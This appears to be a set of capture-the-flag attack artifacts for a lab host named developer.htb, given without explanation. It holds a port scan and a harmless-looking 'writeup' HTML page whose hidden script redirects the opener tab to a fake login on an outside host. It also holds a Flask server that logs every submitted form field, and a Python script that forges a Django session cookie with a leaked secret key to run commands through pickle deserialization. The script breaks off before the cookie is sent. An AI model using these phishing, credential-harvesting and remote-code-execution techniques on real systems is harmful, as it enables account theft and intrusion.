$ nmap -sC -sV 10.10.11.103
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 12:53 CST
Nmap scan report for 10.10.11.103
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 36:aa:93:e4:a4:56:ab:39:86:66:bf:3e:09:fa:eb:e0 (RSA)
|   256 11:fb:e9:89:2e:4b:66:40:7b:6b:01:cf:f2:f2:ee:ef (ECDSA)
|_  256 77:56:93:6e:5f:ea:e2:ad:b0:2e:cf:23:9d:66:ed:12 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://developer.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: developer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.56 seconds
<html>
<body>
<h2>Challenge Writeup</h2>
<p>This challenge was quite well designed! Good job by the developers at Developer for this one. I would definitely recommend it to my friends. It required critical thinking and tools like Ghidra to get the job done</p>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.2:7777/accounts/login/');
if (window.parent != window) window.parent.location.replace('https://10.10.14.2:7777/accounts/login/');
</script>
</body>
</html>
from flask import Flask, redirect, render_template, request

app = Flask(__name__)

# Route path assumed from the redirect target in the HTML above; the page does not show it
@app.route('/accounts/login/', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        # Print every submitted form field, then send the browser on to the real login page
        print('\n'.join([f'{x[0]}: {x[1]}' for x in request.form.items()]))
        return redirect("http://10.10.11.103/accounts/login/", code=302)
    else:
        return render_template('loginform.html')

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=7777)
#!/usr/bin/python2
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
import requests
import sys

cmd = sys.argv[1]

SECRET_KEY = 'c7f3a64aa184b7cbb1a7cbe9cd544913'
# Initial cookie I had on sentry when trying to reset a password
cookie = ".eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQqVGuS55IZFFIeUGTpHcAEFSlKLS5Lz87MzU8FayvOLslNTQnnjE0tLMuJLi1OL4jNTvFlDhZAEkhKTs1PzUkKVIObrlZZk5hTrgeT1XHMTM3McgSwniJpSPQDm9TPf:1n9hcy:HpZvM4Joi_Uu5WcsvPd9o2xXrUY"

# Verify the cookie signature with the leaked key and unpickle the session payload
newContent = django.core.signing.loads(cookie, key=SECRET_KEY,
    serializer=django.contrib.sessions.serializers.PickleSerializer,
    salt='django.contrib.sessions.backends.signed_cookies')

class PickleRce(object):
    def __reduce__(self):
        return (os.system, (cmd,))

newContent['testcookie'] = PickleRce()